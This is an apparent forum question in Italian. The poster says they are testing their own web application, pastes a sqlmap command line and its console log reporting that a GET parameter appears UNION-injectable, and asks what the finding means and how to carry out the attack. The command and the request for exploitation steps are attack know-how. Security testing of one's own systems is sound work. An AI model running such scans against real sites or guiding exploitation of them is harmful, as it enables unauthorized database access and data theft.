Sto usando sqlmap per scoprire la minaccia di sql-injection sulla nostra applicazione.
http://myurl.net/question/teaching/answer/sujan-justice?as=Course
e ho cercato di eseguire quanto segue:
sqlmap.py -u "http://myurl.net/question/teaching/answer/sujan-justice?as=Course" --dbms=mysql --level=5
Ecco la Console :
[11:35:46] [INFO] testing connection to the target URL
[11:35:46] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[11:35:47] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] r
please enter value for parameter 'regex': *
[11:35:59] [INFO] testing if GET parameter 'as' is dynamic
[11:35:59] [WARNING] GET parameter 'as' does not appear dynamic
[11:35:59] [WARNING] heuristic (basic) test shows that GET parameter 'as' might not be injectable
[11:35:59] [INFO] testing for SQL injection on GET parameter 'as'
[11:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:36:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:39:25] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:39:25] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:39:25] [INFO] testing 'MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses'
[11:39:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:40:17] [INFO] target URL appears to be UNION injectable with 1 columns
[11:40:55] [INFO] target URL appears to be UNION injectable with 5 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[11:41:15] [INFO] target URL appears to be UNION injectable with 2 columns
[11:41:36] [INFO] testing 'MySQL UNION query (71) - 11 to 20 columns'
[11:41:38] [INFO] target URL appears to be UNION injectable with 17 columns
[11:41:48] [INFO] target URL appears to be UNION injectable with 15 columns
Qualcuno può aiutarmi a sapere che cosa significa questa linea:
[11:40:17] [INFO] target URL appears to be UNION injectable with 1 columns
Non sono sicuro, ma suppongo che significhi che è possibile eseguire l'attacco SQL sull'applicazione. Se è giusto, allora aiutami come dovrei farlo?